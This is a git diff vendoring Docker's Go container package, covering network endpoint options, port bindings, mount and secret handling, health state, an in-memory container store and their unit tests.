createOptions = append(createOptions, libnetwork.CreateOptionDisableResolution()) + } + + // configs that are applicable only for the endpoint in the network + // to which container was connected to on docker run. + // Ideally all these network-specific endpoint configurations must be moved under + // container.NetworkSettings.Networks[n.Name()] + if n.Name() == container.HostConfig.NetworkMode.NetworkName() || + (n.Name() == defaultNetName && container.HostConfig.NetworkMode.IsDefault()) { + if container.Config.MacAddress != "" { + mac, err := net.ParseMAC(container.Config.MacAddress) + if err != nil { + return nil, err + } + + genericOption := options.Generic{ + netlabel.MacAddress: mac, + } + + createOptions = append(createOptions, libnetwork.EndpointOptionGeneric(genericOption)) + } + } + + // Port-mapping rules belong to the container & applicable only to non-internal networks + portmaps := GetSandboxPortMapInfo(sb) + if n.Info().Internal() || len(portmaps) > 0 { + return createOptions, nil + } + + if container.HostConfig.PortBindings != nil { + for p, b := range container.HostConfig.PortBindings { + bindings[p] = []nat.PortBinding{} + for _, bb := range b { + bindings[p] = append(bindings[p], nat.PortBinding{ + HostIP: bb.HostIP, + HostPort: bb.HostPort, + }) + } + } + } + + portSpecs := container.Config.ExposedPorts + ports := make([]nat.Port, len(portSpecs)) + var i int + for p := range portSpecs { + ports[i] = p + i++ + } + nat.SortPortMap(ports, bindings) + for _, port := range ports { + expose := types.TransportPort{} + expose.Proto = types.ParseProtocol(port.Proto()) + expose.Port = uint16(port.Int()) + exposeList = append(exposeList, expose) + + pb := types.PortBinding{Port: expose.Port, Proto: expose.Proto} + binding := bindings[port] + for i := 0; i < len(binding); i++ { + pbCopy := pb.GetCopy() + newP, err := nat.NewPort(nat.SplitProtoPort(binding[i].HostPort)) + var portStart, portEnd int + if err == nil { + portStart, portEnd, err = newP.Range() + 
} + if err != nil { + return nil, fmt.Errorf("Error parsing HostPort value(%s):%v", binding[i].HostPort, err) + } + pbCopy.HostPort = uint16(portStart) + pbCopy.HostPortEnd = uint16(portEnd) + pbCopy.HostIP = net.ParseIP(binding[i].HostIP) + pbList = append(pbList, pbCopy) + } + + if container.HostConfig.PublishAllPorts && len(binding) == 0 { + pbList = append(pbList, pb) + } + } + + var dns []string + + if len(container.HostConfig.DNS) > 0 { + dns = container.HostConfig.DNS + } else if len(daemonDNS) > 0 { + dns = daemonDNS + } + + if len(dns) > 0 { + createOptions = append(createOptions, + libnetwork.CreateOptionDNS(dns)) + } + + createOptions = append(createOptions, + libnetwork.CreateOptionPortMapping(pbList), + libnetwork.CreateOptionExposedPorts(exposeList)) + + return createOptions, nil +} + +// UpdateMonitor updates monitor configure for running container +func (container *Container) UpdateMonitor(restartPolicy containertypes.RestartPolicy) { + type policySetter interface { + SetPolicy(containertypes.RestartPolicy) + } + + if rm, ok := container.RestartManager().(policySetter); ok { + rm.SetPolicy(restartPolicy) + } +} + +// FullHostname returns hostname and optional domain appended to it. +func (container *Container) FullHostname() string { + fullHostname := container.Config.Hostname + if container.Config.Domainname != "" { + fullHostname = fmt.Sprintf("%s.%s", fullHostname, container.Config.Domainname) + } + return fullHostname +} + +// RestartManager returns the current restartmanager instance connected to container. 
+func (container *Container) RestartManager() restartmanager.RestartManager { + if container.restartManager == nil { + container.restartManager = restartmanager.New(container.HostConfig.RestartPolicy, container.RestartCount) + } + return container.restartManager +} + +// ResetRestartManager initializes new restartmanager based on container config +func (container *Container) ResetRestartManager(resetCount bool) { + if container.restartManager != nil { + container.restartManager.Cancel() + } + if resetCount { + container.RestartCount = 0 + } + container.restartManager = nil +} + +type attachContext struct { + ctx context.Context + cancel context.CancelFunc + mu sync.Mutex +} + +// InitAttachContext initializes or returns existing context for attach calls to +// track container liveness. +func (container *Container) InitAttachContext() context.Context { + container.attachContext.mu.Lock() + defer container.attachContext.mu.Unlock() + if container.attachContext.ctx == nil { + container.attachContext.ctx, container.attachContext.cancel = context.WithCancel(context.Background()) + } + return container.attachContext.ctx +} + +// CancelAttachContext cancels attach context. All attach calls should detach +// after this call. 
+func (container *Container) CancelAttachContext() { + container.attachContext.mu.Lock() + if container.attachContext.ctx != nil { + container.attachContext.cancel() + container.attachContext.ctx = nil + } + container.attachContext.mu.Unlock() +} + +func (container *Container) startLogging() error { + if container.HostConfig.LogConfig.Type == "none" { + return nil // do not start logging routines + } + + l, err := container.StartLogger(container.HostConfig.LogConfig) + if err != nil { + return fmt.Errorf("Failed to initialize logging driver: %v", err) + } + + copier := logger.NewCopier(map[string]io.Reader{"stdout": container.StdoutPipe(), "stderr": container.StderrPipe()}, l) + container.LogCopier = copier + copier.Run() + container.LogDriver = l + + // set LogPath field only for json-file logdriver + if jl, ok := l.(*jsonfilelog.JSONFileLogger); ok { + container.LogPath = jl.LogPath() + } + + return nil +} + +// StdinPipe gets the stdin stream of the container +func (container *Container) StdinPipe() io.WriteCloser { + return container.StreamConfig.StdinPipe() +} + +// StdoutPipe gets the stdout stream of the container +func (container *Container) StdoutPipe() io.ReadCloser { + return container.StreamConfig.StdoutPipe() +} + +// StderrPipe gets the stderr stream of the container +func (container *Container) StderrPipe() io.ReadCloser { + return container.StreamConfig.StderrPipe() +} + +// CloseStreams closes the container's stdio streams +func (container *Container) CloseStreams() error { + return container.StreamConfig.CloseStreams() +} + +// InitializeStdio is called by libcontainerd to connect the stdio. 
+func (container *Container) InitializeStdio(iop libcontainerd.IOPipe) error { + if err := container.startLogging(); err != nil { + container.Reset(false) + return err + } + + container.StreamConfig.CopyToPipe(iop) + + if container.StreamConfig.Stdin() == nil && !container.Config.Tty { + if iop.Stdin != nil { + if err := iop.Stdin.Close(); err != nil { + logrus.Warnf("error closing stdin: %+v", err) + } + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/container/container_linux.go b/vendor/github.com/docker/docker/container/container_linux.go new file mode 100644 index 0000000000..4d4c16b563 --- /dev/null +++ b/vendor/github.com/docker/docker/container/container_linux.go @@ -0,0 +1,9 @@ +package container + +import ( + "golang.org/x/sys/unix" +) + +func detachMounted(path string) error { + return unix.Unmount(path, unix.MNT_DETACH) +} diff --git a/vendor/github.com/docker/docker/container/container_notlinux.go b/vendor/github.com/docker/docker/container/container_notlinux.go new file mode 100644 index 0000000000..f65653e992 --- /dev/null +++ b/vendor/github.com/docker/docker/container/container_notlinux.go @@ -0,0 +1,23 @@ +// +build solaris freebsd + +package container + +import ( + "golang.org/x/sys/unix" +) + +func detachMounted(path string) error { + //Solaris and FreeBSD do not support the lazy unmount or MNT_DETACH feature. + // Therefore there are separate definitions for this. 
+	return unix.Unmount(path, 0)
+}
+
+// SecretMount returns the mount for the secret path
+func (container *Container) SecretMount() *Mount {
+	return nil
+}
+
+// UnmountSecrets unmounts the fs for secrets
+func (container *Container) UnmountSecrets() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/container/container_unit_test.go b/vendor/github.com/docker/docker/container/container_unit_test.go
new file mode 100644
index 0000000000..f301f25bbe
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/container_unit_test.go
@@ -0,0 +1,60 @@
+package container
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/pkg/signal"
+)
+
+func TestContainerStopSignal(t *testing.T) {
+	c := &Container{
+		CommonContainer: CommonContainer{
+			Config: &container.Config{},
+		},
+	}
+
+	def, err := signal.ParseSignal(signal.DefaultStopSignal)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	s := c.StopSignal()
+	if s != int(def) {
+		t.Fatalf("Expected %v, got %v", def, s)
+	}
+
+	c = &Container{
+		CommonContainer: CommonContainer{
+			Config: &container.Config{StopSignal: "SIGKILL"},
+		},
+	}
+	s = c.StopSignal()
+	if s != 9 {
+		t.Fatalf("Expected 9, got %v", s)
+	}
+}
+
+func TestContainerStopTimeout(t *testing.T) {
+	c := &Container{
+		CommonContainer: CommonContainer{
+			Config: &container.Config{},
+		},
+	}
+
+	s := c.StopTimeout()
+	if s != DefaultStopTimeout {
+		t.Fatalf("Expected %v, got %v", DefaultStopTimeout, s)
+	}
+
+	stopTimeout := 15
+	c = &Container{
+		CommonContainer: CommonContainer{
+			Config: &container.Config{StopTimeout: &stopTimeout},
+		},
+	}
+	// BUGFIX: was c.StopSignal(), which only passed by coincidence
+	// (SIGTERM == 15); the override path of StopTimeout was untested.
+	s = c.StopTimeout()
+	if s != 15 {
+		t.Fatalf("Expected 15, got %v", s)
+	}
+}
diff --git a/vendor/github.com/docker/docker/container/container_unix.go b/vendor/github.com/docker/docker/container/container_unix.go
new file mode 100644
index 0000000000..4f6b795d2c
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/container_unix.go
@@ -0,0 +1,448 
@@ +// +build linux freebsd solaris + +package container + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "strings" + + "github.com/Sirupsen/logrus" + containertypes "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/utils" + "github.com/docker/docker/volume" + "github.com/opencontainers/runc/libcontainer/label" + "golang.org/x/sys/unix" +) + +const ( + // DefaultSHMSize is the default size (64MB) of the SHM which will be mounted in the container + DefaultSHMSize int64 = 67108864 + containerSecretMountPath = "/run/secrets" +) + +// Container holds the fields specific to unixen implementations. +// See CommonContainer for standard fields common to all containers. +type Container struct { + CommonContainer + + // Fields below here are platform specific. + AppArmorProfile string + HostnamePath string + HostsPath string + ShmPath string + ResolvConfPath string + SeccompProfile string + NoNewPrivileges bool +} + +// ExitStatus provides exit reasons for a container. +type ExitStatus struct { + // The exit code with which the container exited. + ExitCode int + + // Whether the container encountered an OOM. + OOMKilled bool +} + +// CreateDaemonEnvironment returns the list of all environment variables given the list of +// environment variables related to links. +// Sets PATH, HOSTNAME and if container.Config.Tty is set: TERM. +// The defaults set here do not override the values in container.Config.Env +func (container *Container) CreateDaemonEnvironment(tty bool, linkedEnv []string) []string { + // Setup environment + env := []string{ + "PATH=" + system.DefaultPathEnv, + "HOSTNAME=" + container.Config.Hostname, + } + if tty { + env = append(env, "TERM=xterm") + } + env = append(env, linkedEnv...) 
+ // because the env on the container can override certain default values + // we need to replace the 'env' keys where they match and append anything + // else. + env = utils.ReplaceOrAppendEnvValues(env, container.Config.Env) + return env +} + +// TrySetNetworkMount attempts to set the network mounts given a provided destination and +// the path to use for it; return true if the given destination was a network mount file +func (container *Container) TrySetNetworkMount(destination string, path string) bool { + if destination == "/etc/resolv.conf" { + container.ResolvConfPath = path + return true + } + if destination == "/etc/hostname" { + container.HostnamePath = path + return true + } + if destination == "/etc/hosts" { + container.HostsPath = path + return true + } + + return false +} + +// BuildHostnameFile writes the container's hostname file. +func (container *Container) BuildHostnameFile() error { + hostnamePath, err := container.GetRootResourcePath("hostname") + if err != nil { + return err + } + container.HostnamePath = hostnamePath + return ioutil.WriteFile(container.HostnamePath, []byte(container.Config.Hostname+"\n"), 0644) +} + +// NetworkMounts returns the list of network mounts. 
+func (container *Container) NetworkMounts() []Mount { + var mounts []Mount + shared := container.HostConfig.NetworkMode.IsContainer() + if container.ResolvConfPath != "" { + if _, err := os.Stat(container.ResolvConfPath); err != nil { + logrus.Warnf("ResolvConfPath set to %q, but can't stat this filename (err = %v); skipping", container.ResolvConfPath, err) + } else { + if !container.HasMountFor("/etc/resolv.conf") { + label.Relabel(container.ResolvConfPath, container.MountLabel, shared) + } + writable := !container.HostConfig.ReadonlyRootfs + if m, exists := container.MountPoints["/etc/resolv.conf"]; exists { + writable = m.RW + } + mounts = append(mounts, Mount{ + Source: container.ResolvConfPath, + Destination: "/etc/resolv.conf", + Writable: writable, + Propagation: string(volume.DefaultPropagationMode), + }) + } + } + if container.HostnamePath != "" { + if _, err := os.Stat(container.HostnamePath); err != nil { + logrus.Warnf("HostnamePath set to %q, but can't stat this filename (err = %v); skipping", container.HostnamePath, err) + } else { + if !container.HasMountFor("/etc/hostname") { + label.Relabel(container.HostnamePath, container.MountLabel, shared) + } + writable := !container.HostConfig.ReadonlyRootfs + if m, exists := container.MountPoints["/etc/hostname"]; exists { + writable = m.RW + } + mounts = append(mounts, Mount{ + Source: container.HostnamePath, + Destination: "/etc/hostname", + Writable: writable, + Propagation: string(volume.DefaultPropagationMode), + }) + } + } + if container.HostsPath != "" { + if _, err := os.Stat(container.HostsPath); err != nil { + logrus.Warnf("HostsPath set to %q, but can't stat this filename (err = %v); skipping", container.HostsPath, err) + } else { + if !container.HasMountFor("/etc/hosts") { + label.Relabel(container.HostsPath, container.MountLabel, shared) + } + writable := !container.HostConfig.ReadonlyRootfs + if m, exists := container.MountPoints["/etc/hosts"]; exists { + writable = m.RW + } + mounts = 
append(mounts, Mount{ + Source: container.HostsPath, + Destination: "/etc/hosts", + Writable: writable, + Propagation: string(volume.DefaultPropagationMode), + }) + } + } + return mounts +} + +// SecretMountPath returns the path of the secret mount for the container +func (container *Container) SecretMountPath() string { + return filepath.Join(container.Root, "secrets") +} + +// CopyImagePathContent copies files in destination to the volume. +func (container *Container) CopyImagePathContent(v volume.Volume, destination string) error { + rootfs, err := symlink.FollowSymlinkInScope(filepath.Join(container.BaseFS, destination), container.BaseFS) + if err != nil { + return err + } + + if _, err = ioutil.ReadDir(rootfs); err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + + id := stringid.GenerateNonCryptoID() + path, err := v.Mount(id) + if err != nil { + return err + } + + defer func() { + if err := v.Unmount(id); err != nil { + logrus.Warnf("error while unmounting volume %s: %v", v.Name(), err) + } + }() + if err := label.Relabel(path, container.MountLabel, true); err != nil && err != unix.ENOTSUP { + return err + } + return copyExistingContents(rootfs, path) +} + +// ShmResourcePath returns path to shm +func (container *Container) ShmResourcePath() (string, error) { + return container.GetRootResourcePath("shm") +} + +// HasMountFor checks if path is a mountpoint +func (container *Container) HasMountFor(path string) bool { + _, exists := container.MountPoints[path] + return exists +} + +// UnmountIpcMounts uses the provided unmount function to unmount shm and mqueue if they were mounted +func (container *Container) UnmountIpcMounts(unmount func(pth string) error) { + if container.HostConfig.IpcMode.IsContainer() || container.HostConfig.IpcMode.IsHost() { + return + } + + var warnings []string + + if !container.HasMountFor("/dev/shm") { + shmPath, err := container.ShmResourcePath() + if err != nil { + logrus.Error(err) + warnings = 
append(warnings, err.Error()) + } else if shmPath != "" { + if err := unmount(shmPath); err != nil && !os.IsNotExist(err) { + warnings = append(warnings, fmt.Sprintf("failed to umount %s: %v", shmPath, err)) + } + + } + } + + if len(warnings) > 0 { + logrus.Warnf("failed to cleanup ipc mounts:\n%v", strings.Join(warnings, "\n")) + } +} + +// IpcMounts returns the list of IPC mounts +func (container *Container) IpcMounts() []Mount { + var mounts []Mount + + if !container.HasMountFor("/dev/shm") { + label.SetFileLabel(container.ShmPath, container.MountLabel) + mounts = append(mounts, Mount{ + Source: container.ShmPath, + Destination: "/dev/shm", + Writable: true, + Propagation: string(volume.DefaultPropagationMode), + }) + } + + return mounts +} + +// SecretMount returns the mount for the secret path +func (container *Container) SecretMount() *Mount { + if len(container.SecretReferences) > 0 { + return &Mount{ + Source: container.SecretMountPath(), + Destination: containerSecretMountPath, + Writable: false, + } + } + + return nil +} + +// UnmountSecrets unmounts the local tmpfs for secrets +func (container *Container) UnmountSecrets() error { + if _, err := os.Stat(container.SecretMountPath()); err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + + return detachMounted(container.SecretMountPath()) +} + +// UpdateContainer updates configuration of a container. 
+func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error { + container.Lock() + defer container.Unlock() + + // update resources of container + resources := hostConfig.Resources + cResources := &container.HostConfig.Resources + if resources.BlkioWeight != 0 { + cResources.BlkioWeight = resources.BlkioWeight + } + if resources.CPUShares != 0 { + cResources.CPUShares = resources.CPUShares + } + if resources.CPUPeriod != 0 { + cResources.CPUPeriod = resources.CPUPeriod + } + if resources.CPUQuota != 0 { + cResources.CPUQuota = resources.CPUQuota + } + if resources.CpusetCpus != "" { + cResources.CpusetCpus = resources.CpusetCpus + } + if resources.CpusetMems != "" { + cResources.CpusetMems = resources.CpusetMems + } + if resources.Memory != 0 { + // if memory limit smaller than already set memoryswap limit and doesn't + // update the memoryswap limit, then error out. + if resources.Memory > cResources.MemorySwap && resources.MemorySwap == 0 { + return fmt.Errorf("Memory limit should be smaller than already set memoryswap limit, update the memoryswap at the same time") + } + cResources.Memory = resources.Memory + } + if resources.MemorySwap != 0 { + cResources.MemorySwap = resources.MemorySwap + } + if resources.MemoryReservation != 0 { + cResources.MemoryReservation = resources.MemoryReservation + } + if resources.KernelMemory != 0 { + cResources.KernelMemory = resources.KernelMemory + } + + // update HostConfig of container + if hostConfig.RestartPolicy.Name != "" { + if container.HostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { + return fmt.Errorf("Restart policy cannot be updated because AutoRemove is enabled for the container") + } + container.HostConfig.RestartPolicy = hostConfig.RestartPolicy + } + + if err := container.ToDisk(); err != nil { + logrus.Errorf("Error saving updated container: %v", err) + return err + } + + return nil +} + +// DetachAndUnmount uses a detached mount on all mount destinations, then +// 
unmounts each volume normally.
+// This is used from daemon/archive for `docker cp`
+func (container *Container) DetachAndUnmount(volumeEventLog func(name, action string, attributes map[string]string)) error {
+ networkMounts := container.NetworkMounts()
+ mountPaths := make([]string, 0, len(container.MountPoints)+len(networkMounts))
+
+ for _, mntPoint := range container.MountPoints {
+ dest, err := container.GetResourcePath(mntPoint.Destination)
+ if err != nil {
+ logrus.Warnf("Failed to get volume destination path for container '%s' at '%s' while lazily unmounting: %v", container.ID, mntPoint.Destination, err)
+ continue
+ }
+ mountPaths = append(mountPaths, dest)
+ }
+
+ for _, m := range networkMounts {
+ dest, err := container.GetResourcePath(m.Destination)
+ if err != nil {
+ logrus.Warnf("Failed to get volume destination path for container '%s' at '%s' while lazily unmounting: %v", container.ID, m.Destination, err)
+ continue
+ }
+ mountPaths = append(mountPaths, dest)
+ }
+
+ for _, mountPath := range mountPaths {
+ if err := detachMounted(mountPath); err != nil {
+ logrus.Warnf("%s unmountVolumes: Failed to do lazy umount for volume '%s': %v", container.ID, mountPath, err)
+ }
+ }
+ return container.UnmountVolumes(volumeEventLog)
+}
+
+// copyExistingContents copies from the source to the destination and
+// ensures the ownership is appropriately set. 
+func copyExistingContents(source, destination string) error { + volList, err := ioutil.ReadDir(source) + if err != nil { + return err + } + if len(volList) > 0 { + srcList, err := ioutil.ReadDir(destination) + if err != nil { + return err + } + if len(srcList) == 0 { + // If the source volume is empty, copies files from the root into the volume + if err := chrootarchive.CopyWithTar(source, destination); err != nil { + return err + } + } + } + return copyOwnership(source, destination) +} + +// copyOwnership copies the permissions and uid:gid of the source file +// to the destination file +func copyOwnership(source, destination string) error { + stat, err := system.Stat(source) + if err != nil { + return err + } + + if err := os.Chown(destination, int(stat.UID()), int(stat.GID())); err != nil { + return err + } + + return os.Chmod(destination, os.FileMode(stat.Mode())) +} + +// TmpfsMounts returns the list of tmpfs mounts +func (container *Container) TmpfsMounts() ([]Mount, error) { + var mounts []Mount + for dest, data := range container.HostConfig.Tmpfs { + mounts = append(mounts, Mount{ + Source: "tmpfs", + Destination: dest, + Data: data, + }) + } + for dest, mnt := range container.MountPoints { + if mnt.Type == mounttypes.TypeTmpfs { + data, err := volume.ConvertTmpfsOptions(mnt.Spec.TmpfsOptions, mnt.Spec.ReadOnly) + if err != nil { + return nil, err + } + mounts = append(mounts, Mount{ + Source: "tmpfs", + Destination: dest, + Data: data, + }) + } + } + return mounts, nil +} + +// cleanResourcePath cleans a resource path and prepares to combine with mnt path +func cleanResourcePath(path string) string { + return filepath.Join(string(os.PathSeparator), path) +} + +// EnableServiceDiscoveryOnDefaultNetwork Enable service discovery on default network +func (container *Container) EnableServiceDiscoveryOnDefaultNetwork() bool { + return false +} diff --git a/vendor/github.com/docker/docker/container/container_windows.go 
b/vendor/github.com/docker/docker/container/container_windows.go new file mode 100644 index 0000000000..1025836f1f --- /dev/null +++ b/vendor/github.com/docker/docker/container/container_windows.go @@ -0,0 +1,111 @@ +// +build windows + +package container + +import ( + "fmt" + "os" + "path/filepath" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/utils" +) + +// Container holds fields specific to the Windows implementation. See +// CommonContainer for standard fields common to all containers. +type Container struct { + CommonContainer + + // Fields below here are platform specific. +} + +// ExitStatus provides exit reasons for a container. +type ExitStatus struct { + // The exit code with which the container exited. + ExitCode int +} + +// CreateDaemonEnvironment creates a new environment variable slice for this container. +func (container *Container) CreateDaemonEnvironment(_ bool, linkedEnv []string) []string { + // because the env on the container can override certain default values + // we need to replace the 'env' keys where they match and append anything + // else. + return utils.ReplaceOrAppendEnvValues(linkedEnv, container.Config.Env) +} + +// UnmountIpcMounts unmounts Ipc related mounts. +// This is a NOOP on windows. +func (container *Container) UnmountIpcMounts(unmount func(pth string) error) { +} + +// IpcMounts returns the list of Ipc related mounts. +func (container *Container) IpcMounts() []Mount { + return nil +} + +// SecretMount returns the mount for the secret path +func (container *Container) SecretMount() *Mount { + return nil +} + +// UnmountSecrets unmounts the fs for secrets +func (container *Container) UnmountSecrets() error { + return nil +} + +// DetachAndUnmount unmounts all volumes. +// On Windows it only delegates to `UnmountVolumes` since there is nothing to +// force unmount. 
+func (container *Container) DetachAndUnmount(volumeEventLog func(name, action string, attributes map[string]string)) error { + return container.UnmountVolumes(volumeEventLog) +} + +// TmpfsMounts returns the list of tmpfs mounts +func (container *Container) TmpfsMounts() ([]Mount, error) { + var mounts []Mount + return mounts, nil +} + +// UpdateContainer updates configuration of a container +func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error { + container.Lock() + defer container.Unlock() + resources := hostConfig.Resources + if resources.BlkioWeight != 0 || resources.CPUShares != 0 || + resources.CPUPeriod != 0 || resources.CPUQuota != 0 || + resources.CpusetCpus != "" || resources.CpusetMems != "" || + resources.Memory != 0 || resources.MemorySwap != 0 || + resources.MemoryReservation != 0 || resources.KernelMemory != 0 { + return fmt.Errorf("Resource updating isn't supported on Windows") + } + // update HostConfig of container + if hostConfig.RestartPolicy.Name != "" { + if container.HostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { + return fmt.Errorf("Restart policy cannot be updated because AutoRemove is enabled for the container") + } + container.HostConfig.RestartPolicy = hostConfig.RestartPolicy + } + return nil +} + +// cleanResourcePath cleans a resource path by removing C:\ syntax, and prepares +// to combine with a volume path +func cleanResourcePath(path string) string { + if len(path) >= 2 { + c := path[0] + if path[1] == ':' && ('a' <= c && c <= 'z' || 'A' <= c && c <= 'Z') { + path = path[2:] + } + } + return filepath.Join(string(os.PathSeparator), path) +} + +// BuildHostnameFile writes the container's hostname file. 
+func (container *Container) BuildHostnameFile() error { + return nil +} + +// EnableServiceDiscoveryOnDefaultNetwork Enable service discovery on default network +func (container *Container) EnableServiceDiscoveryOnDefaultNetwork() bool { + return true +} diff --git a/vendor/github.com/docker/docker/container/health.go b/vendor/github.com/docker/docker/container/health.go new file mode 100644 index 0000000000..6e3cd12f3b --- /dev/null +++ b/vendor/github.com/docker/docker/container/health.go @@ -0,0 +1,49 @@ +package container + +import ( + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" +) + +// Health holds the current container health-check state +type Health struct { + types.Health + stop chan struct{} // Write struct{} to stop the monitor +} + +// String returns a human-readable description of the health-check state +func (s *Health) String() string { + // This happens when the container is being shutdown and the monitor has stopped + // or the monitor has yet to be setup. + if s.stop == nil { + return types.Unhealthy + } + + switch s.Status { + case types.Starting: + return "health: starting" + default: // Healthy and Unhealthy are clear on their own + return s.Status + } +} + +// OpenMonitorChannel creates and returns a new monitor channel. If there already is one, +// it returns nil. +func (s *Health) OpenMonitorChannel() chan struct{} { + if s.stop == nil { + logrus.Debug("OpenMonitorChannel") + s.stop = make(chan struct{}) + return s.stop + } + return nil +} + +// CloseMonitorChannel closes any existing monitor channel. 
+func (s *Health) CloseMonitorChannel() { + if s.stop != nil { + logrus.Debug("CloseMonitorChannel: waiting for probe to stop") + close(s.stop) + s.stop = nil + logrus.Debug("CloseMonitorChannel done") + } +} diff --git a/vendor/github.com/docker/docker/container/history.go b/vendor/github.com/docker/docker/container/history.go new file mode 100644 index 0000000000..c80c2aa0cc --- /dev/null +++ b/vendor/github.com/docker/docker/container/history.go @@ -0,0 +1,30 @@ +package container + +import "sort" + +// History is a convenience type for storing a list of containers, +// sorted by creation date in descendant order. +type History []*Container + +// Len returns the number of containers in the history. +func (history *History) Len() int { + return len(*history) +} + +// Less compares two containers and returns true if the second one +// was created before the first one. +func (history *History) Less(i, j int) bool { + containers := *history + return containers[j].Created.Before(containers[i].Created) +} + +// Swap switches containers i and j positions in the history. +func (history *History) Swap(i, j int) { + containers := *history + containers[i], containers[j] = containers[j], containers[i] +} + +// sort orders the history by creation date in descendant order. +func (history *History) sort() { + sort.Sort(history) +} diff --git a/vendor/github.com/docker/docker/container/memory_store.go b/vendor/github.com/docker/docker/container/memory_store.go new file mode 100644 index 0000000000..706407a71c --- /dev/null +++ b/vendor/github.com/docker/docker/container/memory_store.go @@ -0,0 +1,95 @@ +package container + +import ( + "sync" +) + +// memoryStore implements a Store in memory. +type memoryStore struct { + s map[string]*Container + sync.RWMutex +} + +// NewMemoryStore initializes a new memory store. +func NewMemoryStore() Store { + return &memoryStore{ + s: make(map[string]*Container), + } +} + +// Add appends a new container to the memory store. 
+// It overrides the id if it existed before. +func (c *memoryStore) Add(id string, cont *Container) { + c.Lock() + c.s[id] = cont + c.Unlock() +} + +// Get returns a container from the store by id. +func (c *memoryStore) Get(id string) *Container { + var res *Container + c.RLock() + res = c.s[id] + c.RUnlock() + return res +} + +// Delete removes a container from the store by id. +func (c *memoryStore) Delete(id string) { + c.Lock() + delete(c.s, id) + c.Unlock() +} + +// List returns a sorted list of containers from the store. +// The containers are ordered by creation date. +func (c *memoryStore) List() []*Container { + containers := History(c.all()) + containers.sort() + return containers +} + +// Size returns the number of containers in the store. +func (c *memoryStore) Size() int { + c.RLock() + defer c.RUnlock() + return len(c.s) +} + +// First returns the first container found in the store by a given filter. +func (c *memoryStore) First(filter StoreFilter) *Container { + for _, cont := range c.all() { + if filter(cont) { + return cont + } + } + return nil +} + +// ApplyAll calls the reducer function with every container in the store. +// This operation is asynchronous in the memory store. +// NOTE: Modifications to the store MUST NOT be done by the StoreReducer. 
+func (c *memoryStore) ApplyAll(apply StoreReducer) { + wg := new(sync.WaitGroup) + for _, cont := range c.all() { + wg.Add(1) + go func(container *Container) { + apply(container) + wg.Done() + }(cont) + } + + wg.Wait() +} + +func (c *memoryStore) all() []*Container { + c.RLock() + containers := make([]*Container, 0, len(c.s)) + for _, cont := range c.s { + containers = append(containers, cont) + } + c.RUnlock() + return containers +} + +var _ Store = &memoryStore{} diff --git a/vendor/github.com/docker/docker/container/memory_store_test.go b/vendor/github.com/docker/docker/container/memory_store_test.go new file mode 100644 index 0000000000..f81738fae1 --- /dev/null +++ b/vendor/github.com/docker/docker/container/memory_store_test.go @@ -0,0 +1,106 @@ +package container + +import ( + "testing" + "time" +) + +func TestNewMemoryStore(t *testing.T) { + s := NewMemoryStore() + m, ok := s.(*memoryStore) + if !ok { + t.Fatalf("store is not a memory store %v", s) + } + if m.s == nil { + t.Fatal("expected store map to not be nil") + } +} + +func TestAddContainers(t *testing.T) { + s := NewMemoryStore() + s.Add("id", NewBaseContainer("id", "root")) + if s.Size() != 1 { + t.Fatalf("expected store size 1, got %v", s.Size()) + } +} + +func TestGetContainer(t *testing.T) { + s := NewMemoryStore() + s.Add("id", NewBaseContainer("id", "root")) + c := s.Get("id") + if c == nil { + t.Fatal("expected container to not be nil") + } +} + +func TestDeleteContainer(t *testing.T) { + s := NewMemoryStore() + s.Add("id", NewBaseContainer("id", "root")) + s.Delete("id") + if c := s.Get("id"); c != nil { + t.Fatalf("expected container to be nil after removal, got %v", c) + } + + if s.Size() != 0 { + t.Fatalf("expected store size to be 0, got %v", s.Size()) + } +} + +func TestListContainers(t *testing.T) { + s := NewMemoryStore() + + cont := NewBaseContainer("id", "root") + cont.Created = time.Now() + cont2 := NewBaseContainer("id2", "root") + cont2.Created = time.Now().Add(24 * time.Hour) + 
+ s.Add("id", cont)
+ s.Add("id2", cont2)
+
+ list := s.List()
+ if len(list) != 2 {
+ t.Fatalf("expected list size 2, got %v", len(list))
+ }
+ if list[0].ID != "id2" {
+ t.Fatalf("expected newer container to be first, got %v", list[0].ID)
+ }
+}
+
+func TestFirstContainer(t *testing.T) {
+ s := NewMemoryStore()
+
+ s.Add("id", NewBaseContainer("id", "root"))
+ s.Add("id2", NewBaseContainer("id2", "root"))
+
+ first := s.First(func(cont *Container) bool {
+ return cont.ID == "id2"
+ })
+
+ if first == nil {
+ t.Fatal("expected container to not be nil")
+ }
+ if first.ID != "id2" {
+ t.Fatalf("expected id2, got %v", first)
+ }
+}
+
+func TestApplyAllContainer(t *testing.T) {
+ s := NewMemoryStore()
+
+ s.Add("id", NewBaseContainer("id", "root"))
+ s.Add("id2", NewBaseContainer("id2", "root"))
+
+ s.ApplyAll(func(cont *Container) {
+ if cont.ID == "id2" {
+ cont.ID = "newID"
+ }
+ })
+
+ cont := s.Get("id2")
+ if cont == nil {
+ t.Fatal("expected container to not be nil")
+ }
+ if cont.ID != "newID" {
+ t.Fatalf("expected newID, got %v", cont)
+ }
+}
diff --git a/vendor/github.com/docker/docker/container/monitor.go b/vendor/github.com/docker/docker/container/monitor.go
new file mode 100644
index 0000000000..f05e72b25f
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/monitor.go
@@ -0,0 +1,46 @@
+package container
+
+import (
+ "time"
+
+ "github.com/Sirupsen/logrus"
+)
+
+const (
+ loggerCloseTimeout = 10 * time.Second
+)
+
+// Reset puts a container into a state where it can be restarted again. 
